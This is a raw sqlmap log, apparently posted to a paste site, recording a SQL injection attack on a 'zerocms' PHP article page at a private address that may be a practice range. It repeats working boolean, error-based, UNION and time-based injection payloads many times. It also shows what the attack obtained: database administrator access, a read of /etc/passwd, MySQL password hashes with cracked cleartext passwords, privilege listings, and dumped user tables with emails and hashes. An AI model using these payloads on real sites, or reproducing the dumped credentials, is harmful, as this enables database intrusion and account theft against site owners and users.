- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT 8377 FROM(SELECT COUNT(*),CONCAT(0x717a707871,(SELECT (CASE WHEN (8377=8377) THEN 1 ELSE 0 END)),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: UNION query
- Title: MySQL UNION query (NULL) - 6 columns
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=-5238 UNION ALL SELECT CONCAT(0x717a707871,0x6b536c61616d42486a73,0x71626a6271),NULL,NULL,NULL,NULL,NULL#
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind (SELECT)
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QOUU)
- ---
- web server operating system: Linux Debian 7.0 (wheezy)
- web application technology: Apache 2.2.22, PHP 5.4.4
- back-end DBMS: MySQL 5
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Parameter: #1* (URI)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND 8917=8917
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT 8377 FROM(SELECT COUNT(*),CONCAT(0x717a707871,(SELECT (CASE WHEN (8377=8377) THEN 1 ELSE 0 END)),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: UNION query
- Title: MySQL UNION query (NULL) - 6 columns
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=-5238 UNION ALL SELECT CONCAT(0x717a707871,0x6b536c61616d42486a73,0x71626a6271),NULL,NULL,NULL,NULL,NULL#
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind (SELECT)
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QOUU)
- ---
- web server operating system: Linux Debian 7.0 (wheezy)
- web application technology: Apache 2.2.22, PHP 5.4.4
- back-end DBMS: MySQL 5
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Parameter: #1* (URI)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND 8917=8917
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT 8377 FROM(SELECT COUNT(*),CONCAT(0x717a707871,(SELECT (CASE WHEN (8377=8377) THEN 1 ELSE 0 END)),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: UNION query
- Title: MySQL UNION query (NULL) - 6 columns
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=-5238 UNION ALL SELECT CONCAT(0x717a707871,0x6b536c61616d42486a73,0x71626a6271),NULL,NULL,NULL,NULL,NULL#
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind (SELECT)
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QOUU)
- ---
- web server operating system: Linux Debian 7.0 (wheezy)
- web application technology: Apache 2.2.22, PHP 5.4.4
- back-end DBMS: MySQL 5
- files saved to [1]:
- [*] /root/.sqlmap/output/10.100.101.130/files/_etc_passwd (same file)
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Parameter: #1* (URI)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND 8917=8917
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT 8377 FROM(SELECT COUNT(*),CONCAT(0x717a707871,(SELECT (CASE WHEN (8377=8377) THEN 1 ELSE 0 END)),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: UNION query
- Title: MySQL UNION query (NULL) - 6 columns
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=-5238 UNION ALL SELECT CONCAT(0x717a707871,0x6b536c61616d42486a73,0x71626a6271),NULL,NULL,NULL,NULL,NULL#
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind (SELECT)
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QOUU)
- ---
- web server operating system: Linux Debian 7.0 (wheezy)
- web application technology: Apache 2.2.22, PHP 5.4.4
- back-end DBMS: MySQL 5
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Parameter: #1* (URI)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND 8917=8917
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT 8377 FROM(SELECT COUNT(*),CONCAT(0x717a707871,(SELECT (CASE WHEN (8377=8377) THEN 1 ELSE 0 END)),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: UNION query
- Title: MySQL UNION query (NULL) - 6 columns
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=-5238 UNION ALL SELECT CONCAT(0x717a707871,0x6b536c61616d42486a73,0x71626a6271),NULL,NULL,NULL,NULL,NULL#
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind (SELECT)
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QOUU)
- ---
- web server operating system: Linux Debian 7.0 (wheezy)
- web application technology: Apache 2.2.22, PHP 5.4.4
- back-end DBMS: MySQL 5
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Parameter: #1* (URI)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND 8917=8917
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT 8377 FROM(SELECT COUNT(*),CONCAT(0x717a707871,(SELECT (CASE WHEN (8377=8377) THEN 1 ELSE 0 END)),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: UNION query
- Title: MySQL UNION query (NULL) - 6 columns
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=-5238 UNION ALL SELECT CONCAT(0x717a707871,0x6b536c61616d42486a73,0x71626a6271),NULL,NULL,NULL,NULL,NULL#
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind (SELECT)
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QOUU)
- ---
- web server operating system: Linux Debian 7.0 (wheezy)
- web application technology: Apache 2.2.22, PHP 5.4.4
- back-end DBMS: MySQL 5
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Parameter: #1* (URI)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND 8917=8917
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT 8377 FROM(SELECT COUNT(*),CONCAT(0x717a707871,(SELECT (CASE WHEN (8377=8377) THEN 1 ELSE 0 END)),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: UNION query
- Title: MySQL UNION query (NULL) - 6 columns
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=-5238 UNION ALL SELECT CONCAT(0x717a707871,0x6b536c61616d42486a73,0x71626a6271),NULL,NULL,NULL,NULL,NULL#
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind (SELECT)
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QOUU)
- ---
- web server operating system: Linux Debian 7.0 (wheezy)
- web application technology: Apache 2.2.22, PHP 5.4.4
- back-end DBMS: MySQL 5
- banner: '5.5.38-0+wheezy1'
- current user: 'root@%'
- current database: 'zerocms'
- hostname: 'mysql'
- current user is DBA: True
- database management system users [1]:
- [*] 'root'@'localhost'
- database management system users password hashes:
- [*] debian-sys-maint [1]:
- password hash: *9871EDA3E80AE14784EC40F1DD72B99881C5D718
- [*] pma [1]:
- password hash: *03E2854B1BC2353C7FED1F780C55F7845322DC57
- [*] root [1]:
- password hash: *4AD47E08DAE2BD4F0977EED5D23DC901359DF617
- clear-text password: abcd1234
- [*] zerocmsuser [1]:
- password hash: *4AD47E08DAE2BD4F0977EED5D23DC901359DF617
- clear-text password: abcd1234
- database management system users privileges:
- [*] 'debian-sys-maint'@'localhost' (administrator) [28]:
- privilege: ALTER
- privilege: ALTER ROUTINE
- privilege: CREATE
- privilege: CREATE ROUTINE
- privilege: CREATE TABLESPACE
- privilege: CREATE TEMPORARY TABLES
- privilege: CREATE USER
- privilege: CREATE VIEW
- privilege: DELETE
- privilege: DROP
- privilege: EVENT
- privilege: EXECUTE
- privilege: FILE
- privilege: INDEX
- privilege: INSERT
- privilege: LOCK TABLES
- privilege: PROCESS
- privilege: REFERENCES
- privilege: RELOAD
- privilege: REPLICATION CLIENT
- privilege: REPLICATION SLAVE
- privilege: SELECT
- privilege: SHOW DATABASES
- privilege: SHOW VIEW
- privilege: SHUTDOWN
- privilege: SUPER
- privilege: TRIGGER
- privilege: UPDATE
- [*] 'pma'@'localhost' [1]:
- privilege: USAGE
- [*] 'root'@'::1' (administrator) [21]:
- privilege: ALTER
- privilege: CREATE
- privilege: CREATE TEMPORARY TABLES
- privilege: CREATE VIEW
- privilege: DELETE
- privilege: DROP
- privilege: EXECUTE
- privilege: FILE
- privilege: INDEX
- privilege: INSERT
- privilege: LOCK TABLES
- privilege: PROCESS
- privilege: REFERENCES
- privilege: RELOAD
- privilege: REPLICATION CLIENT
- privilege: REPLICATION SLAVE
- privilege: SELECT
- privilege: SHOW DATABASES
- privilege: SHUTDOWN
- privilege: SUPER
- privilege: UPDATE
- [*] 'root'@'localhost' (administrator) [28]:
- privilege: ALTER
- privilege: ALTER ROUTINE
- privilege: CREATE
- privilege: CREATE ROUTINE
- privilege: CREATE TABLESPACE
- privilege: CREATE TEMPORARY TABLES
- privilege: CREATE USER
- privilege: CREATE VIEW
- privilege: DELETE
- privilege: DROP
- privilege: EVENT
- privilege: EXECUTE
- privilege: FILE
- privilege: INDEX
- privilege: INSERT
- privilege: LOCK TABLES
- privilege: PROCESS
- privilege: REFERENCES
- privilege: RELOAD
- privilege: REPLICATION CLIENT
- privilege: REPLICATION SLAVE
- privilege: SELECT
- privilege: SHOW DATABASES
- privilege: SHOW VIEW
- privilege: SHUTDOWN
- privilege: SUPER
- privilege: TRIGGER
- privilege: UPDATE
- [*] 'zerocmsuser'@'10.100.101.130' [1]:
- privilege: USAGE
- [*] 'zerocmsuser'@'localhost' [1]:
- privilege: USAGE
- database management system users roles:
- [*] 'debian-sys-maint'@'localhost' (administrator) [28]:
- role: ALTER
- role: ALTER ROUTINE
- role: CREATE
- role: CREATE ROUTINE
- role: CREATE TABLESPACE
- role: CREATE TEMPORARY TABLES
- role: CREATE USER
- role: CREATE VIEW
- role: DELETE
- role: DROP
- role: EVENT
- role: EXECUTE
- role: FILE
- role: INDEX
- role: INSERT
- role: LOCK TABLES
- role: PROCESS
- role: REFERENCES
- role: RELOAD
- role: REPLICATION CLIENT
- role: REPLICATION SLAVE
- role: SELECT
- role: SHOW DATABASES
- role: SHOW VIEW
- role: SHUTDOWN
- role: SUPER
- role: TRIGGER
- role: UPDATE
- [*] 'pma'@'localhost' [1]:
- role: USAGE
- [*] 'root'@'::1' (administrator) [21]:
- role: ALTER
- role: CREATE
- role: CREATE TEMPORARY TABLES
- role: CREATE VIEW
- role: DELETE
- role: DROP
- role: EXECUTE
- role: FILE
- role: INDEX
- role: INSERT
- role: LOCK TABLES
- role: PROCESS
- role: REFERENCES
- role: RELOAD
- role: REPLICATION CLIENT
- role: REPLICATION SLAVE
- role: SELECT
- role: SHOW DATABASES
- role: SHUTDOWN
- role: SUPER
- role: UPDATE
- [*] 'root'@'localhost' (administrator) [28]:
- role: ALTER
- role: ALTER ROUTINE
- role: CREATE
- role: CREATE ROUTINE
- role: CREATE TABLESPACE
- role: CREATE TEMPORARY TABLES
- role: CREATE USER
- role: CREATE VIEW
- role: DELETE
- role: DROP
- role: EVENT
- role: EXECUTE
- role: FILE
- role: INDEX
- role: INSERT
- role: LOCK TABLES
- role: PROCESS
- role: REFERENCES
- role: RELOAD
- role: REPLICATION CLIENT
- role: REPLICATION SLAVE
- role: SELECT
- role: SHOW DATABASES
- role: SHOW VIEW
- role: SHUTDOWN
- role: SUPER
- role: TRIGGER
- role: UPDATE
- [*] 'zerocmsuser'@'10.100.101.130' [1]:
- role: USAGE
- [*] 'zerocmsuser'@'localhost' [1]:
- role: USAGE
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Parameter: #1* (URI)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND 8917=8917
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT 8377 FROM(SELECT COUNT(*),CONCAT(0x717a707871,(SELECT (CASE WHEN (8377=8377) THEN 1 ELSE 0 END)),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: UNION query
- Title: MySQL UNION query (NULL) - 6 columns
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=-5238 UNION ALL SELECT CONCAT(0x717a707871,0x6b536c61616d42486a73,0x71626a6271),NULL,NULL,NULL,NULL,NULL#
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind (SELECT)
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QOUU)
- ---
- web server operating system: Linux Debian 7.0 (wheezy)
- web application technology: Apache 2.2.22, PHP 5.4.4
- back-end DBMS: MySQL 5
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Parameter: #1* (URI)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND 8917=8917
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT 8377 FROM(SELECT COUNT(*),CONCAT(0x717a707871,(SELECT (CASE WHEN (8377=8377) THEN 1 ELSE 0 END)),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: UNION query
- Title: MySQL UNION query (NULL) - 6 columns
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=-5238 UNION ALL SELECT CONCAT(0x717a707871,0x6b536c61616d42486a73,0x71626a6271),NULL,NULL,NULL,NULL,NULL#
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind (SELECT)
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QOUU)
- ---
- web server operating system: Linux Debian 7.0 (wheezy)
- web application technology: Apache 2.2.22, PHP 5.4.4
- back-end DBMS: MySQL 5
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Parameter: #1* (URI)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND 8917=8917
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT 8377 FROM(SELECT COUNT(*),CONCAT(0x717a707871,(SELECT (CASE WHEN (8377=8377) THEN 1 ELSE 0 END)),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: UNION query
- Title: MySQL UNION query (NULL) - 6 columns
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=-5238 UNION ALL SELECT CONCAT(0x717a707871,0x6b536c61616d42486a73,0x71626a6271),NULL,NULL,NULL,NULL,NULL#
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind (SELECT)
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QOUU)
- ---
- web server operating system: Linux Debian 7.0 (wheezy)
- web application technology: Apache 2.2.22, PHP 5.4.4
- back-end DBMS: MySQL 5
- sqlmap identified the following injection points with a total of 57 HTTP(s) requests:
- ---
- Parameter: #1* (URI)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: http://10.100.101.130:80/zero_view_article.php/?article_id=1 AND 9562=9562
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: http://10.100.101.130:80/zero_view_article.php/?article_id=1 AND (SELECT 3978 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (CASE WHEN (3978=3978) THEN 1 ELSE 0 END)),0x716b707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: UNION query
- Title: MySQL UNION query (NULL) - 6 columns
- Payload: http://10.100.101.130:80/zero_view_article.php/?article_id=-4178 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162626b71,0x547676426143646f4f41,0x716b707671),NULL,NULL#
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind (SELECT)
- Payload: http://10.100.101.130:80/zero_view_article.php/?article_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))xfeB)
- ---
- web server operating system: Linux Debian 7.0 (wheezy)
- web application technology: Apache 2.2.22, PHP 5.4.4
- back-end DBMS: MySQL 5.0
- Database: zerocms
- [4 tables]
- +--------------------+
- | zero_access_levels |
- | zero_articles |
- | zero_comments |
- | zero_users |
- +--------------------+
- Database: zerocms
- Table: zero_articles
- [7 columns]
- +--------------+------------------+
- | Column | Type |
- +--------------+------------------+
- | article_id | int(10) unsigned |
- | article_text | mediumtext |
- | is_published | tinyint(1) |
- | publish_date | datetime |
- | submit_date | datetime |
- | title | varchar(255) |
- | user_id | int(10) unsigned |
- +--------------+------------------+
- Database: zerocms
- Table: zero_access_levels
- [2 columns]
- +--------------+---------------------+
- | Column | Type |
- +--------------+---------------------+
- | access_level | tinyint(3) unsigned |
- | access_name | varchar(50) |
- +--------------+---------------------+
- Database: zerocms
- Table: zero_comments
- [5 columns]
- +--------------+------------------+
- | Column | Type |
- +--------------+------------------+
- | article_id | int(10) unsigned |
- | comment_date | datetime |
- | comment_id | int(10) unsigned |
- | comment_text | mediumtext |
- | user_id | int(10) unsigned |
- +--------------+------------------+
- Database: zerocms
- Table: zero_users
- [5 columns]
- +--------------+---------------------+
- | Column | Type |
- +--------------+---------------------+
- | access_level | tinyint(3) unsigned |
- | email | varchar(100) |
- | name | varchar(100) |
- | password | char(41) |
- | user_id | int(10) unsigned |
- +--------------+---------------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Parameter: #1* (URI)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: http://10.100.101.130:80/zero_view_article.php/?article_id=1 AND 9562=9562
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: http://10.100.101.130:80/zero_view_article.php/?article_id=1 AND (SELECT 3978 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (CASE WHEN (3978=3978) THEN 1 ELSE 0 END)),0x716b707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: UNION query
- Title: MySQL UNION query (NULL) - 6 columns
- Payload: http://10.100.101.130:80/zero_view_article.php/?article_id=-4178 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162626b71,0x547676426143646f4f41,0x716b707671),NULL,NULL#
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind (SELECT)
- Payload: http://10.100.101.130:80/zero_view_article.php/?article_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))xfeB)
- ---
- web server operating system: Linux Debian 7.0 (wheezy)
- web application technology: Apache 2.2.22, PHP 5.4.4
- back-end DBMS: MySQL >= 5.0.0
- Database: zerocms
- [4 tables]
- +--------------------+
- | zero_access_levels |
- | zero_articles |
- | zero_comments |
- | zero_users |
- +--------------------+
- Database: zerocms
- Table: zero_articles
- [7 columns]
- +--------------+------------------+
- | Column | Type |
- +--------------+------------------+
- | article_id | int(10) unsigned |
- | article_text | mediumtext |
- | is_published | tinyint(1) |
- | publish_date | datetime |
- | submit_date | datetime |
- | title | varchar(255) |
- | user_id | int(10) unsigned |
- +--------------+------------------+
- Database: zerocms
- Table: zero_access_levels
- [2 columns]
- +--------------+---------------------+
- | Column | Type |
- +--------------+---------------------+
- | access_level | tinyint(3) unsigned |
- | access_name | varchar(50) |
- +--------------+---------------------+
- Database: zerocms
- Table: zero_comments
- [5 columns]
- +--------------+------------------+
- | Column | Type |
- +--------------+------------------+
- | article_id | int(10) unsigned |
- | comment_date | datetime |
- | comment_id | int(10) unsigned |
- | comment_text | mediumtext |
- | user_id | int(10) unsigned |
- +--------------+------------------+
- Database: zerocms
- Table: zero_users
- [5 columns]
- +--------------+---------------------+
- | Column | Type |
- +--------------+---------------------+
- | access_level | tinyint(3) unsigned |
- | email | varchar(100) |
- | name | varchar(100) |
- | password | char(41) |
- | user_id | int(10) unsigned |
- +--------------+---------------------+
- Database: zerocms
- Table: zero_access_levels
- [3 entries]
- +---------------+--------------+
- | access_name | access_level |
- +---------------+--------------+
- | User | 1 |
- | Moderator | 2 |
- | Administrator | 3 |
- +---------------+--------------+
- Database: zerocms
- Table: zero_articles
- [1 entry]
- +---------+------------+---------+---------------------+---------------------+--------------+--------------+
- | user_id | article_id | title | submit_date | publish_date | article_text | is_published |
- +---------+------------+---------+---------------------+---------------------+--------------+--------------+
- | 1 | 1 | testing | 2014-07-07 17:48:27 | 2014-07-07 17:49:05 | 123... | 1 |
- +---------+------------+---------+---------------------+---------------------+--------------+--------------+
- Database: zerocms
- Table: zero_comments
- [0 entries]
- +---------+------------+------------+--------------+--------------+
- | user_id | comment_id | article_id | comment_date | comment_text |
- +---------+------------+------------+--------------+--------------+
- +---------+------------+------------+--------------+--------------+
- Database: zerocms
- Table: zero_users
- [4 entries]
- +---------+---------------+--------------------+------------------------------------------------------+--------------+
- | user_id | name | email | password | access_level |
- +---------+---------------+--------------------+------------------------------------------------------+--------------+
- | 1 | Administrator | admin@domain.com | *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 (password) | 3 |
- | 2 | test | test@example.com | *4AD47E08DAE2BD4F0977EED5D23DC901359DF617 (abcd1234) | 1 |
- | 3 | scorebot | scorebot@alpha.net | *ECE94505E92F10DA0A7F0F0D4423ED2A4F50937B | 1 |
- | 4 | scorebot | scorebot@gamma.net | *2946E303DFA13F709B6DF6DB1167D921BEFFF7EA | 1 |
- +---------+---------------+--------------------+------------------------------------------------------+--------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Parameter: #1* (URI)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: http://10.100.101.130:80/zero_view_article.php/?article_id=1 AND 9562=9562
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: http://10.100.101.130:80/zero_view_article.php/?article_id=1 AND (SELECT 3978 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (CASE WHEN (3978=3978) THEN 1 ELSE 0 END)),0x716b707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: UNION query
- Title: MySQL UNION query (NULL) - 6 columns
- Payload: http://10.100.101.130:80/zero_view_article.php/?article_id=-4178 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162626b71,0x547676426143646f4f41,0x716b707671),NULL,NULL#
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind (SELECT)
- Payload: http://10.100.101.130:80/zero_view_article.php/?article_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))xfeB)
- ---
- web server operating system: Linux Debian 7.0 (wheezy)
- web application technology: Apache 2.2.22, PHP 5.4.4
- back-end DBMS: MySQL >= 5.0.0
- Database: zerocms
- [4 tables]
- +--------------------+
- | zero_access_levels |
- | zero_articles |
- | zero_comments |
- | zero_users |
- +--------------------+
- Database: zerocms
- Table: zero_articles
- [7 columns]
- +--------------+------------------+
- | Column | Type |
- +--------------+------------------+
- | article_id | int(10) unsigned |
- | article_text | mediumtext |
- | is_published | tinyint(1) |
- | publish_date | datetime |
- | submit_date | datetime |
- | title | varchar(255) |
- | user_id | int(10) unsigned |
- +--------------+------------------+
- Database: zerocms
- Table: zero_access_levels
- [2 columns]
- +--------------+---------------------+
- | Column | Type |
- +--------------+---------------------+
- | access_level | tinyint(3) unsigned |
- | access_name | varchar(50) |
- +--------------+---------------------+
- Database: zerocms
- Table: zero_comments
- [5 columns]
- +--------------+------------------+
- | Column | Type |
- +--------------+------------------+
- | article_id | int(10) unsigned |
- | comment_date | datetime |
- | comment_id | int(10) unsigned |
- | comment_text | mediumtext |
- | user_id | int(10) unsigned |
- +--------------+------------------+
- Database: zerocms
- Table: zero_users
- [5 columns]
- +--------------+---------------------+
- | Column | Type |
- +--------------+---------------------+
- | access_level | tinyint(3) unsigned |
- | email | varchar(100) |
- | name | varchar(100) |
- | password | char(41) |
- | user_id | int(10) unsigned |
- +--------------+---------------------+
- Database: zerocms
- Table: zero_access_levels
- [3 entries]
- +---------------+--------------+
- | access_name | access_level |
- +---------------+--------------+
- | User | 1 |
- | Moderator | 2 |
- | Administrator | 3 |
- +---------------+--------------+
- Database: zerocms
- Table: zero_articles
- [1 entry]
- +---------+------------+---------+---------------------+---------------------+--------------+--------------+
- | user_id | article_id | title | submit_date | publish_date | article_text | is_published |
- +---------+------------+---------+---------------------+---------------------+--------------+--------------+
- | 1 | 1 | testing | 2014-07-07 17:48:27 | 2014-07-07 17:49:05 | 123... | 1 |
- +---------+------------+---------+---------------------+---------------------+--------------+--------------+
- Database: zerocms
- Table: zero_comments
- [0 entries]
- +---------+------------+------------+--------------+--------------+
- | user_id | comment_id | article_id | comment_date | comment_text |
- +---------+------------+------------+--------------+--------------+
- +---------+------------+------------+--------------+--------------+
- Database: zerocms
- Table: zero_users
- [4 entries]
- +---------+---------------+--------------------+-------------------------------------------+--------------+
- | user_id | name | email | password | access_level |
- +---------+---------------+--------------------+-------------------------------------------+--------------+
- | 1 | Administrator | admin@domain.com | *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 | 3 |
- | 2 | test | test@example.com | *4AD47E08DAE2BD4F0977EED5D23DC901359DF617 | 1 |
- | 3 | scorebot | scorebot@alpha.net | *ECE94505E92F10DA0A7F0F0D4423ED2A4F50937B | 1 |
- | 4 | scorebot | scorebot@gamma.net | *2946E303DFA13F709B6DF6DB1167D921BEFFF7EA | 1 |
- +---------+---------------+--------------------+-------------------------------------------+--------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement